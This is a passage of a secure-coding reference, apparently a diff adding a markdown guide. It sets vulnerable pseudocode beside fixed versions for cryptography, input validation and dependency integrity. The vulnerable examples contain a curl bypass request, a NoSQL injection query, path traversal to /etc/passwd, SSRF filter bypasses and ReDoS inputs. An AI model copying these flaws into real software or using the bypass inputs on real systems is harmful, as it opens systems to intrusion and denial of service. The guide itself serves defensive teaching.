+// plaintext_block_1 = "AAAAAAAAAAAAAAAA" +// plaintext_block_2 = "AAAAAAAAAAAAAAAA" +// ciphertext_1 == ciphertext_2 // Information leaked! 
+ +// ======================================== +// GOOD: Use authenticated encryption modes +// ======================================== +FUNCTION encrypt_gcm(plaintext, key): + // GCM mode: Each encryption is unique even for same plaintext + nonce = crypto.secure_random_bytes(12) // 96-bit nonce for GCM + + cipher = AES_GCM.new(key, nonce) + ciphertext, auth_tag = cipher.encrypt_and_digest(plaintext) + + // Return nonce + tag + ciphertext (all needed for decryption) + RETURN nonce + auth_tag + ciphertext +END FUNCTION + +FUNCTION decrypt_gcm(encrypted_data, key): + // Extract components + nonce = encrypted_data[0:12] + auth_tag = encrypted_data[12:28] + ciphertext = encrypted_data[28:] + + cipher = AES_GCM.new(key, nonce) + + TRY: + plaintext = cipher.decrypt_and_verify(ciphertext, auth_tag) + RETURN plaintext + CATCH AuthenticationError: + // Tampering detected! + log.warning("Decryption failed: authentication tag mismatch") + THROW Error("Data integrity check failed") + END TRY +END FUNCTION + +// Alternative: CBC mode (if GCM not available) +FUNCTION encrypt_cbc(plaintext, enc_key, mac_key): + // CBC requires random IV for each encryption + iv = crypto.secure_random_bytes(16) + + cipher = AES_CBC.new(enc_key, iv) + padded = pkcs7_pad(plaintext, block_size=16) + ciphertext = cipher.encrypt(padded) + + // Must also add HMAC for authentication (encrypt-then-MAC) + // Use a separate MAC key; do not reuse the encryption key + mac = hmac_sha256(mac_key, iv + ciphertext) + + RETURN iv + ciphertext + mac +END FUNCTION +``` + +### 5.4 Missing or Weak IVs/Nonces + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable or reused IVs/nonces +// ======================================== +FUNCTION encrypt_static_iv(plaintext, key): + // Vulnerable: Static IV - identical plaintexts have identical ciphertexts + iv = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) + cipher = AES_CBC.new(key, iv) + RETURN cipher.encrypt(pad(plaintext)) +END FUNCTION + +FUNCTION
encrypt_counter_nonce(plaintext, key, message_counter): + // Vulnerable: Caller-supplied counter repeats if it resets (restart, rollback, multiple writers) + nonce = int_to_bytes(message_counter, length=12) + cipher = AES_GCM.new(key, nonce) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +FUNCTION encrypt_truncated_nonce(plaintext, key): + // Vulnerable: Nonce too short + nonce = crypto.secure_random_bytes(4) // Only 32 bits! + cipher = AES_GCM.new(key, nonce) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +// Problems: +// - Static IV: Same plaintext → same ciphertext (pattern leakage) +// - Predictable IV (CBC): Allows chosen-plaintext attacks +// - Unmanaged counter nonce (GCM): Repeats under the same key if the counter resets or is shared +// - Short nonce: Birthday collision after ~2^16 messages +// - GCM with repeated nonce: CATASTROPHIC - authentication key recovered! + +// ======================================== +// GOOD: Cryptographically random IVs/nonces +// ======================================== +FUNCTION encrypt_with_random_iv(plaintext, key): + // Generate random IV for each encryption + iv = crypto.secure_random_bytes(16) // 128 bits for AES-CBC + + cipher = AES_CBC.new(key, iv) + padded = pkcs7_pad(plaintext, block_size=16) + ciphertext = cipher.encrypt(padded) + + // Prepend IV (it's not secret, but must be unpredictable) + // CBC alone is unauthenticated: pair it with encrypt-then-MAC + RETURN iv + ciphertext +END FUNCTION + +FUNCTION encrypt_with_random_nonce(plaintext, key): + // Generate random nonce for each encryption + nonce = crypto.secure_random_bytes(12) // 96 bits for AES-GCM + + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + + RETURN nonce + tag + ciphertext +END FUNCTION + +// For high-volume encryption: Use key+nonce management +FUNCTION encrypt_with_derived_nonce(plaintext, key, message_id): + // Derive the nonce from the message ID with a key-specific PRF + // message_id must be unique per message under this key, or the nonce repeats + + nonce_key = derive_key(key, "nonce-derivation") + nonce = hmac_sha256(nonce_key, message_id)[0:12] + + cipher = AES_GCM.new(key, nonce) + ciphertext, tag =
cipher.encrypt_and_digest(plaintext) + + RETURN message_id + tag + ciphertext // Include message_id for decryption +END FUNCTION +``` + +### 5.5 Rolling Your Own Crypto + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Custom cryptographic implementations +// ======================================== +FUNCTION my_encrypt(plaintext, key): + // Vulnerable: XOR "encryption" is trivially broken + result = "" + FOR i = 0 TO plaintext.length - 1: + result += char(plaintext[i] XOR key[i % key.length]) + END FOR + RETURN result +END FUNCTION + +FUNCTION my_hash(data): + // Vulnerable: Custom hash is not collision-resistant + result = 0 + FOR byte IN data: + result = (result * 31 + byte) % 2147483647 + END FOR + RETURN result +END FUNCTION + +FUNCTION my_random(seed): + // Vulnerable: Linear congruential generator + RETURN (seed * 1103515245 + 12345) % (2^31) +END FUNCTION + +// Problems: +// - XOR cipher: Trivially broken with known-plaintext +// - Custom hash: Collisions easily found +// - LCG random: Completely predictable sequence + +// ======================================== +// GOOD: Use established cryptographic libraries +// ======================================== +FUNCTION encrypt_properly(plaintext, key): + // Use vetted library implementations + // Python: cryptography library + // Node.js: crypto module + // Java: javax.crypto + // Go: crypto/* packages + + // AES-GCM from standard library + nonce = crypto.secure_random_bytes(12) + cipher = crypto.createCipheriv("aes-256-gcm", key, nonce) + + ciphertext = cipher.update(plaintext) + cipher.final() + auth_tag = cipher.getAuthTag() + + RETURN nonce + auth_tag + ciphertext +END FUNCTION + +FUNCTION hash_properly(data): + // Use standard library hash functions + RETURN crypto.sha256(data) +END FUNCTION + +FUNCTION random_properly(num_bytes): + // Use OS-provided cryptographic randomness + RETURN crypto.secure_random_bytes(num_bytes) +END FUNCTION + +// 
Rule: Never implement cryptographic primitives yourself +// - Encryption: Use library AES-GCM, ChaCha20-Poly1305 +// - Hashing: Use library SHA-256, SHA-3, BLAKE2 +// - Signatures: Use library Ed25519, ECDSA +// - Random: Use the platform CSPRNG (e.g. Python secrets module or os.urandom) +``` + +### 5.6 Insecure Random Number Generation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Non-cryptographic RNG for security +// ======================================== +FUNCTION generate_session_id_weak(): + // Vulnerable: Math.random() / random.random() is predictable + RETURN random.randint(0, 999999999) +END FUNCTION + +FUNCTION generate_token_weak(): + // Vulnerable: Using random module for security tokens + chars = "abcdefghijklmnopqrstuvwxyz0123456789" + token = "" + FOR i = 1 TO 32: + token += chars[random.randint(0, chars.length - 1)] + END FOR + RETURN token +END FUNCTION + +FUNCTION generate_key_weak(): + // Vulnerable: Time-based seeding + random.seed(current_timestamp()) + key = random.randbytes(32) + RETURN key +END FUNCTION + +// Problems: +// - Math.random() / random.random(): Non-cryptographic PRNGs (xorshift128+ in V8, Mersenne Twister in Python) +// - Time seed: Attacker can guess seed from approximate time +// - Internal state: Mersenne Twister state can be recovered from 624 consecutive 32-bit outputs + +// ======================================== +// GOOD: Cryptographically secure randomness +// ======================================== +FUNCTION generate_session_id_secure(): + // Use cryptographically secure random + RETURN secrets.token_urlsafe(32) // 256 bits of entropy +END FUNCTION + +FUNCTION generate_token_secure(): + // Use secrets module (Python) or crypto.randomBytes (Node) + RETURN secrets.token_hex(32) // 256 bits as hex string +END FUNCTION + +FUNCTION generate_key_secure(): + // Use OS entropy source + RETURN os.urandom(32) // 256 bits from /dev/urandom or equivalent +END FUNCTION + +FUNCTION generate_password_secure(length): + // Secure password generation + alphabet =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*" + password = "" + FOR i = 0 TO length - 1: + password += alphabet[secrets.randbelow(alphabet.length)] + END FOR + RETURN password +END FUNCTION + +// Language-specific secure random: +// Python: secrets module, os.urandom +// Node.js: crypto.randomBytes, crypto.randomUUID +// Java: SecureRandom +// Go: crypto/rand +// Ruby: SecureRandom +// PHP: random_bytes, random_int +``` + +### 5.7 Improper Key Derivation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Weak key derivation methods +// ======================================== +FUNCTION derive_key_weak(password): + // Vulnerable: Direct hash of password + RETURN sha256(password) +END FUNCTION + +FUNCTION derive_key_truncated(password): + // Vulnerable: Password truncation + RETURN password.bytes()[0:32] // Loses entropy! +END FUNCTION + +FUNCTION derive_key_md5(password, salt): + // Vulnerable: MD5 with low iteration count + RETURN md5(salt + password) +END FUNCTION + +FUNCTION derive_key_fast(password, salt): + // Vulnerable: Single SHA iteration (too fast to brute-force resist) + RETURN sha256(salt + password) +END FUNCTION + +// Problems: +// - Direct hash: No salt, no iterations, vulnerable to rainbow tables +// - Truncation: Reduces entropy, predictable patterns +// - Fast hash: GPU can compute billions per second + +// ======================================== +// GOOD: Proper key derivation functions +// ======================================== +FUNCTION derive_key_pbkdf2(password, salt): + // PBKDF2 with high iteration count + IF salt IS NULL: + salt = crypto.secure_random_bytes(32) + END IF + + key = pbkdf2_hmac( + hash_name="sha256", + password=password.encode(), + salt=salt, + iterations=600000, // OWASP recommends 600,000+ for SHA-256 + key_length=32 + ) + RETURN {key: key, salt: salt} +END FUNCTION + +FUNCTION derive_key_argon2(password, salt): + // Argon2id - 
memory-hard, recommended for passwords + IF salt IS NULL: + salt = crypto.secure_random_bytes(16) + END IF + + key = argon2id.hash( + password=password, + salt=salt, + time_cost=3, // Iterations + memory_cost=65536, // 64MB memory + parallelism=4, // 4 threads + hash_len=32 // Output length + ) + RETURN {key: key, salt: salt} +END FUNCTION + +FUNCTION derive_key_scrypt(password, salt): + // scrypt - memory-hard alternative + IF salt IS NULL: + salt = crypto.secure_random_bytes(32) + END IF + + key = scrypt( + password=password.encode(), + salt=salt, + n=2^17, // CPU/memory cost (131072) + r=8, // Block size + p=1, // Parallelism + key_length=32 + ) + RETURN {key: key, salt: salt} +END FUNCTION + +// For deriving multiple keys from one password +FUNCTION derive_multiple_keys(password, salt): + // Use HKDF to derive multiple keys from master key + master_key = derive_key_argon2(password, salt).key + + encryption_key = hkdf_expand( + master_key, + info="encryption", + length=32 + ) + + mac_key = hkdf_expand( + master_key, + info="mac", + length=32 + ) + + RETURN { + encryption_key: encryption_key, + mac_key: mac_key + } +END FUNCTION +``` + +--- + +## 6. Input Validation + +**CWE References:** CWE-20 (Improper Input Validation), CWE-1284 (Improper Validation of Specified Quantity in Input), CWE-1333 (Inefficient Regular Expression Complexity), CWE-22 (Path Traversal), CWE-180 (Incorrect Behavior Order: Validate Before Canonicalize) +**Severity:** High | **Related:** [[Input-Validation]] + +> **Risk:** Input validation failures are a foundational vulnerability enabling most other attack classes. AI-generated code frequently relies solely on client-side validation (trivially bypassed) or omits validation entirely. Missing length limits enable DoS attacks, improper type checking allows type confusion attacks, and ReDoS patterns can freeze services. All user input must be validated on the server with type, length, format, and range constraints. 
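As a rough illustration of the four constraint types named in the risk note (type, length, format, range), here is a minimal Python sketch. The field names `username` and `quantity`, the limits, and the function name `validate_order` are assumptions made for this example and are not part of the reference patterns.

```python
import re

# Hypothetical limits for illustration; tune them to the application.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,32}")
MAX_QUANTITY = 100


def validate_order(payload):
    """Return a list of validation errors (empty when the payload is acceptable)."""
    errors = []

    username = payload.get("username")
    if not isinstance(username, str):              # type check
        errors.append("username must be a string")
    elif len(username) > 32:                       # length check
        errors.append("username too long")
    elif not USERNAME_RE.fullmatch(username):      # format check
        errors.append("username has invalid characters or is too short")

    quantity = payload.get("quantity")
    # bool is a subclass of int in Python, so reject it explicitly.
    if not isinstance(quantity, int) or isinstance(quantity, bool):
        errors.append("quantity must be an integer")
    elif not 1 <= quantity <= MAX_QUANTITY:        # range check
        errors.append("quantity out of range")

    return errors
```

The checks run on the server regardless of what the client already validated; the allow-list regex is deliberately simple (no nested quantifiers) so it cannot trigger catastrophic backtracking.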
+ +### 6.1 Missing Server-Side Validation (Client-Only) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Client-side only validation +// ======================================== +// Frontend JavaScript +FUNCTION validate_form_client_only(): + email = document.getElementById("email").value + age = document.getElementById("age").value + + IF NOT email.includes("@"): + show_error("Invalid email") + RETURN FALSE + END IF + + IF age < 0 OR age > 150: + show_error("Invalid age") + RETURN FALSE + END IF + + // Form submits if client-side validation passes + form.submit() +END FUNCTION + +// Backend - NO validation! +FUNCTION create_user(request): + // Vulnerable: Trusts client-side validation completely + email = request.body.email + age = request.body.age + + database.insert("users", {email: email, age: age}) + RETURN {success: TRUE} +END FUNCTION + +// Attack: Attacker bypasses JavaScript with direct HTTP request +// curl -X POST /api/users -d '{"email":"not-an-email","age":-999}' +// Result: Invalid data stored in database + +// ======================================== +// GOOD: Server-side validation (client-side is UX only) +// ======================================== +// Backend - validates everything +FUNCTION create_user(request): + // Validate all input server-side + validation_errors = [] + + // Email validation + email = request.body.email + IF typeof(email) != "string": + validation_errors.append("Email must be a string") + ELSE IF NOT regex.match("^[^@]+@[^@]+\.[^@]+$", email): + validation_errors.append("Invalid email format") + ELSE IF email.length > 254: + validation_errors.append("Email too long") + END IF + + // Age validation + age = request.body.age + IF typeof(age) != "number" OR NOT is_integer(age): + validation_errors.append("Age must be an integer") + ELSE IF age < 0 OR age > 150: + validation_errors.append("Age must be between 0 and 150") + END IF + + IF validation_errors.length > 0: 
+ RETURN {success: FALSE, errors: validation_errors} + END IF + + // Safe to process validated data + database.insert("users", {email: email, age: age}) + RETURN {success: TRUE} +END FUNCTION + +// Client-side validation is still useful for UX (immediate feedback) +// but NEVER rely on it for security +``` + +### 6.2 Improper Type Checking + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Missing or weak type validation +// ======================================== +FUNCTION process_payment_weak(request): + amount = request.body.amount + quantity = request.body.quantity + + // Vulnerable: No type checking + total = amount * quantity + + // What if amount = "100" (string)? JavaScript: "100" * 2 = 200 (coerced) + // What if amount = [100]? Some languages coerce arrays unexpectedly + // What if quantity = {"$gt": 0}? NoSQL injection possible + + charge_card(user, total) +END FUNCTION + +FUNCTION get_user_weak(request): + user_id = request.params.id + + // Vulnerable: ID could be array, object, or unexpected type + // MongoDB: ?id[$ne]=null returns all users! 
+ RETURN database.find_one({id: user_id}) +END FUNCTION + +FUNCTION calculate_discount_weak(price, discount_percent): + // Vulnerable: No validation of numeric types + // discount_percent = "50" → string concatenation in some languages + // discount_percent = NaN → NaN propagates through calculations + final_price = price - (price * discount_percent / 100) + RETURN final_price +END FUNCTION + +// ======================================== +// GOOD: Strict type validation +// ======================================== +FUNCTION process_payment_safe(request): + // Validate amount + amount = request.body.amount + IF typeof(amount) != "number": + THROW ValidationError("Amount must be a number") + END IF + IF NOT is_finite(amount) OR is_nan(amount): + THROW ValidationError("Amount must be a valid number") + END IF + IF amount <= 0: + THROW ValidationError("Amount must be positive") + END IF + + // Validate quantity + quantity = request.body.quantity + IF typeof(quantity) != "number" OR NOT is_integer(quantity): + THROW ValidationError("Quantity must be an integer") + END IF + IF quantity <= 0 OR quantity > 1000: + THROW ValidationError("Quantity must be between 1 and 1000") + END IF + + // Safe to calculate + total = amount * quantity + + // Additional: Prevent floating point issues with currency + total_cents = round(total * 100) // Work in cents + charge_card(user, total_cents) +END FUNCTION + +FUNCTION get_user_safe(request): + user_id = request.params.id + + // Strict type checking + IF typeof(user_id) != "string": + THROW ValidationError("User ID must be a string") + END IF + + // Format validation (e.g., UUID) + IF NOT is_valid_uuid(user_id): + THROW ValidationError("Invalid user ID format") + END IF + + RETURN database.find_one({id: user_id}) +END FUNCTION + +// Type coercion helper with explicit validation +FUNCTION parse_integer_strict(value, min, max): + IF typeof(value) == "number": + IF NOT is_integer(value): + THROW ValidationError("Expected integer, got 
float") + END IF + result = value + ELSE IF typeof(value) == "string": + IF NOT regex.match("^-?[0-9]+$", value): + THROW ValidationError("Invalid integer format") + END IF + result = parse_int(value) + ELSE: + THROW ValidationError("Expected number or numeric string") + END IF + + IF result < min OR result > max: + THROW ValidationError("Value out of range: " + min + " to " + max) + END IF + + RETURN result +END FUNCTION +``` + +### 6.3 Missing Length Limits + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No length limits on input +// ======================================== +FUNCTION create_post_unlimited(request): + title = request.body.title + content = request.body.content + + // Vulnerable: No length limits + // Attacker sends 1GB title, exhausts memory/storage + database.insert("posts", {title: title, content: content}) +END FUNCTION + +FUNCTION search_unlimited(request): + query = request.params.q + + // Vulnerable: Long query strings can DoS search systems + // Also enables ReDoS if query is used in regex + results = database.search(query) + RETURN results +END FUNCTION + +FUNCTION process_file_unlimited(request): + file_content = request.body.file + + // Vulnerable: No file size limit + // Attacker uploads 10GB file, exhausts disk/memory + save_file(file_content) +END FUNCTION + +// Real-world DoS: JSON payload with deeply nested objects +// {"a":{"a":{"a":{"a":...}}}} // 1000 levels deep +// Can crash parsers or exhaust stack space + +// ======================================== +// GOOD: Enforce length limits on all inputs +// ======================================== +CONSTANT MAX_TITLE_LENGTH = 200 +CONSTANT MAX_CONTENT_LENGTH = 50000 +CONSTANT MAX_SEARCH_QUERY = 500 +CONSTANT MAX_FILE_SIZE = 10 * 1024 * 1024 // 10MB +CONSTANT MAX_JSON_DEPTH = 20 + +FUNCTION create_post_limited(request): + title = request.body.title + content = request.body.content + + // Validate title length + IF 
typeof(title) != "string": + THROW ValidationError("Title must be a string") + END IF + IF title.length == 0: + THROW ValidationError("Title is required") + END IF + IF title.length > MAX_TITLE_LENGTH: + THROW ValidationError("Title exceeds " + MAX_TITLE_LENGTH + " characters") + END IF + + // Validate content length + IF typeof(content) != "string": + THROW ValidationError("Content must be a string") + END IF + IF content.length > MAX_CONTENT_LENGTH: + THROW ValidationError("Content exceeds " + MAX_CONTENT_LENGTH + " characters") + END IF + + database.insert("posts", {title: title, content: content}) +END FUNCTION + +FUNCTION search_limited(request): + query = request.params.q + + IF typeof(query) != "string": + THROW ValidationError("Query must be a string") + END IF + IF query.length > MAX_SEARCH_QUERY: + THROW ValidationError("Search query too long") + END IF + IF query.length < 2: + THROW ValidationError("Search query too short") + END IF + + results = database.search(query) + RETURN results +END FUNCTION + +// Configure request body limits at framework level +FUNCTION configure_server(): + server.set_body_limit(MAX_FILE_SIZE) + server.set_json_depth_limit(MAX_JSON_DEPTH) + server.set_parameter_limit(1000) // Max form fields + server.set_header_size_limit(8192) // 8KB header limit +END FUNCTION + +// Array length limits +FUNCTION process_batch_request(request): + items = request.body.items + + IF NOT is_array(items): + THROW ValidationError("Items must be an array") + END IF + IF items.length > 100: + THROW ValidationError("Maximum 100 items per batch") + END IF + + FOR item IN items: + process_single_item(item) + END FOR +END FUNCTION +``` + +### 6.4 Regex Denial of Service (ReDoS) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Vulnerable regex patterns +// ======================================== +FUNCTION validate_email_redos(email): + // Vulnerable: Catastrophic backtracking on malformed 
input + // Pattern with nested quantifiers + pattern = "^([a-zA-Z0-9]+)+@[a-zA-Z0-9]+\.[a-zA-Z]+$" + + // Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!" + // Regex engine tries exponential combinations before failing + RETURN regex.match(pattern, email) +END FUNCTION + +FUNCTION validate_url_redos(url): + // Vulnerable: Multiple overlapping groups + pattern = "^(https?://)?(www\.)?([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}(/.*)*$" + + // Attack input: "http://aaaaaaaaaaaaaaaaaaaaaaaa" + RETURN regex.match(pattern, url) +END FUNCTION + +FUNCTION search_with_regex(user_pattern, content): + // Vulnerable: User-controlled regex pattern + // Attacker provides: "(a+)+$" with input "aaaaaaaaaaaaaaaaaaaX" + RETURN regex.search(user_pattern, content) +END FUNCTION + +// ReDoS patterns to avoid: +// - Nested quantifiers: (a+)+, (a*)* +// - Overlapping alternatives: (a|a)+, (a|ab)+ +// - Quantified groups with repetition: (a+b+)+ + +// ======================================== +// GOOD: Safe regex patterns and practices +// ======================================== +FUNCTION validate_email_safe(email): + // First: Length check before regex + IF email.length > 254: + RETURN FALSE + END IF + + // Use atomic groups or possessive quantifiers if available + // Or use simpler, non-backtracking patterns + pattern = "^[^@\s]+@[^@\s]+\.[^@\s]+$" // Simple, no backtracking risk + + RETURN regex.match(pattern, email) +END FUNCTION + +FUNCTION validate_email_best(email): + // Best: Use a validated library + TRY: + validated = email_validator.validate(email) + RETURN TRUE + CATCH ValidationError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_url_safe(url): + // Length limit first + IF url.length > 2048: + RETURN FALSE + END IF + + // Use URL parser instead of regex + TRY: + parsed = url_parser.parse(url) + RETURN parsed.host IS NOT NULL AND parsed.protocol IN ["http:", "https:"] + CATCH ParseError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION search_with_safe_pattern(user_input, 
content): + // Never use user input directly as regex + // Escape special characters if literal match needed + escaped_input = regex.escape(user_input) + + // Set timeout on regex operations + RETURN regex.search(escaped_input, content, timeout=1000) // 1 second max +END FUNCTION + +// Use RE2 or similar guaranteed-linear-time regex engine +FUNCTION search_with_re2(pattern, content): + // RE2 never backtracks; it rejects constructs it cannot run in linear time + // (backreferences, lookaround) + TRY: + compiled = re2.compile(pattern) + RETURN compiled.search(content) + CATCH UnsupportedPatternError: + // Pattern uses a construct RE2 does not support + THROW ValidationError("Invalid search pattern") + END TRY +END FUNCTION + +// Safe pattern testing (heuristic only; not a substitute for a linear-time engine or a timeout) +FUNCTION is_safe_regex(pattern): + // Detect common ReDoS patterns: a quantified group whose body is itself quantified or alternated + dangerous_patterns = [ + "\\([^)]*\\+\\)\\+", // (x+)+ + "\\([^)]*\\*\\)\\+", // (x*)+ + "\\([^)]*\\+\\)\\*", // (x+)* + "\\([^)]*\\|[^)]*\\)\\+" // (a|b)+ + ] + + FOR dangerous IN dangerous_patterns: + IF regex.search(dangerous, pattern): + RETURN FALSE + END IF + END FOR + + RETURN TRUE +END FUNCTION +``` + +### 6.5 Accepting and Processing Untrusted Data + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Trusting external data sources +// ======================================== +FUNCTION process_webhook_unsafe(request): + // Vulnerable: No signature verification + data = json.parse(request.body) + + // Attacker can spoof webhook requests + IF data.event == "payment_completed": + mark_order_paid(data.order_id) // Dangerous! + END IF +END FUNCTION + +FUNCTION fetch_and_process_unsafe(url): + // Vulnerable: Processing arbitrary external content + response = http.get(url) + data = json.parse(response.body) + + // No validation of response structure + database.insert("external_data", data) +END FUNCTION + +FUNCTION deserialize_unsafe(serialized_data): + // Vulnerable: Pickle/eval deserialization of untrusted data + // Allows arbitrary code execution! 
+ object = pickle.loads(serialized_data) + RETURN object +END FUNCTION + +FUNCTION process_xml_unsafe(xml_string): + // Vulnerable: XXE (XML External Entity) attack + parser = xml.create_parser() + doc = parser.parse(xml_string) + // Attacker XML: + RETURN doc +END FUNCTION + +// ======================================== +// GOOD: Validate and sanitize external data +// ======================================== +FUNCTION process_webhook_safe(request): + // Verify webhook signature + signature = request.headers.get("X-Signature") + expected = hmac_sha256(WEBHOOK_SECRET, request.raw_body) + + IF NOT constant_time_compare(signature, expected): + log.warning("Invalid webhook signature", {ip: request.ip}) + RETURN {status: 401, error: "Invalid signature"} + END IF + + // Validate payload structure + data = json.parse(request.body) + + IF NOT validate_webhook_schema(data): + RETURN {status: 400, error: "Invalid payload"} + END IF + + // Process verified and validated data + IF data.event == "payment_completed": + // Additional verification: Check with payment provider + IF verify_payment_with_provider(data.payment_id): + mark_order_paid(data.order_id) + END IF + END IF +END FUNCTION + +FUNCTION fetch_and_process_safe(url): + // Validate URL is from allowed sources + parsed_url = url_parser.parse(url) + IF parsed_url.host NOT IN ALLOWED_HOSTS: + THROW ValidationError("URL host not allowed") + END IF + + // Fetch with timeout and size limits + response = http.get(url, timeout=10, max_size=1024*1024) + + // Parse and validate structure + TRY: + data = json.parse(response.body) + CATCH JSONError: + THROW ValidationError("Invalid JSON response") + END TRY + + // Validate against expected schema + validated_data = validate_schema(data, EXPECTED_SCHEMA) + + // Sanitize before storing + sanitized = sanitize_object(validated_data) + database.insert("external_data", sanitized) +END FUNCTION + +FUNCTION deserialize_safe(data, format): + // Never use pickle/eval for untrusted data + 
// Use safe serialization formats + IF format == "json": + RETURN json.parse(data) + ELSE IF format == "msgpack": + RETURN msgpack.unpack(data) + ELSE: + THROW Error("Unsupported format") + END IF +END FUNCTION + +FUNCTION process_xml_safe(xml_string): + // Disable external entities and DTDs + parser = xml.create_parser( + resolve_entities=FALSE, + load_dtd=FALSE, + no_network=TRUE + ) + + TRY: + doc = parser.parse(xml_string) + RETURN doc + CATCH XMLError as e: + log.warning("XML parsing failed", {error: e.message}) + THROW ValidationError("Invalid XML") + END TRY +END FUNCTION + +// Schema validation helper +FUNCTION validate_schema(data, schema): + // Use JSON Schema or similar validation library + validator = JsonSchemaValidator(schema) + + IF NOT validator.is_valid(data): + errors = validator.get_errors() + THROW ValidationError("Schema validation failed: " + errors.join(", ")) + END IF + + RETURN data +END FUNCTION +``` + +### 6.6 Missing Canonicalization + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Validation without canonicalization +// ======================================== +FUNCTION check_path_unsafe(requested_path): + // Vulnerable: Path not canonicalized before validation + IF requested_path.starts_with("/uploads/"): + // Bypass: "/uploads/../../etc/passwd" starts with /uploads/, so it passes the check + // But resolves to outside the directory! 
+ RETURN read_file(requested_path) + END IF + THROW AccessDenied("Invalid path") +END FUNCTION + +FUNCTION check_url_unsafe(url): + // Vulnerable: URL manipulation bypasses check + // Blocked: "http://internal-server" + // Bypass: "http://internal-server%00.example.com" + // Bypass: "http://0x7f000001" (127.0.0.1 in hex) + // Bypass: "http://localhost" vs "http://LOCALHOST" vs "http://127.0.0.1" + + IF url.contains("internal-server"): + THROW AccessDenied("Internal URLs not allowed") + END IF + + RETURN http.get(url) +END FUNCTION + +FUNCTION validate_filename_unsafe(filename): + // Vulnerable: Unicode normalization bypass + // Blocked: "config.php" + // Bypass: "config.php" with full-width characters (config.php) + // Bypass: "config.php\x00.txt" (null byte injection) + + IF filename.ends_with(".php"): + THROW AccessDenied("PHP files not allowed") + END IF + + save_file(filename) +END FUNCTION + +FUNCTION check_html_unsafe(content): + // Vulnerable: Case-sensitive blacklist + // Blocked: " + +// Downloading without verification +FUNCTION download_dependency(url): + content = http.get(url) + write_file("lib/dependency.js", content) + // No verification that content is what we expected +END FUNCTION + +// Package install without lockfile integrity +FUNCTION install(): + run_command("npm install") // Uses ^ ranges, no integrity check +END FUNCTION + +// Build process pulling from remote without checks +FUNCTION build(): + // Downloading build tools without verification + download("https://build-tools.example.com/compiler.tar.gz") + extract("compiler.tar.gz") + execute("./compiler/build") // Running unverified code +END FUNCTION + +// ======================================== +// GOOD: Verify integrity at every step +// ======================================== + +// HTML with Subresource Integrity (SRI) + + +// Download with hash verification +FUNCTION download_verified(url, expected_hash): + content = http.get(url) + + // Calculate hash of downloaded content + 
actual_hash = crypto.sha384(content) + + IF actual_hash != expected_hash: + log.error("Integrity check failed", { + url: url, + expected: expected_hash, + actual: actual_hash + }) + THROW SecurityError("Downloaded file failed integrity check") + END IF + + RETURN content +END FUNCTION + +FUNCTION download_dependency(url, expected_hash): + content = download_verified(url, expected_hash) + write_file("lib/dependency.js", content) + log.info("Dependency installed with verified integrity", {url: url}) +END FUNCTION + +// Package lockfile with integrity hashes +// package-lock.json includes: +{ + "lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDE0cyTsc..." // Verified on install + } +} + +// Strict install from lockfile +FUNCTION install_with_integrity(): + // npm ci verifies integrity hashes from lockfile + result = run_command("npm ci") + + IF NOT result.success: + THROW Error("Installation failed integrity verification") + END IF +END FUNCTION + +// Build reproducibility with verified tools +FUNCTION secure_build(): + // Pin and verify all build tool versions + tools = { + "node": {version: "20.10.0", hash: "sha256:abc123..."}, + "npm": {version: "10.2.3", hash: "sha256:def456..."}, + "compiler": {version: "1.2.3", hash: "sha256:ghi789..."} + } + + FOR tool_name, tool_spec IN tools: + // Verify tool binary integrity before use + actual_hash = hash_file(get_tool_path(tool_name)) + + IF actual_hash != tool_spec.hash: + THROW SecurityError("Build tool integrity check failed: " + tool_name) + END IF + END FOR + + // Proceed with verified tools + run_build() +END FUNCTION + +// Generate SRI hashes for your own assets +FUNCTION generate_sri_hash(file_path): + content = read_file(file_path) + hash = crypto.sha384_base64(content) + RETURN "sha384-" + hash +END FUNCTION + +FUNCTION generate_script_tag(src, file_path): + integrity = generate_sri_hash(file_path) + RETURN '<script src="' + src + '" integrity="' + integrity + '" crossorigin="anonymous"></script>' +END FUNCTION + +// 
Registry verification +FUNCTION verify_registry(): + // Ensure using official, signed registry + registry_config = get_registry_config() + + IF NOT registry_config.url.startswith("https://"): + THROW SecurityError("Registry must use HTTPS") + END IF + + // Verify registry certificate + IF NOT verify_certificate(registry_config.url): + THROW SecurityError("Registry certificate verification failed") + END IF + + // Check for registry signing if supported + IF registry_supports_signing(registry_config.url): + enable_signature_verification() + END IF +END FUNCTION +``` + +### 8.6 Trusting Transitive Dependencies Blindly + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Ignoring transitive dependency risks +// ======================================== + +// Your package.json has 10 direct dependencies +// But those bring in 500+ transitive dependencies +// Each is a potential attack vector + +FUNCTION show_dependency_problem(): + // You audit only direct dependencies + direct_deps = ["express", "lodash", "axios"] // 3 packages + + // Reality after npm install + all_deps = get_all_installed_packages() + print("Direct: 3, Total installed: " + all_deps.count) // 547 packages! 
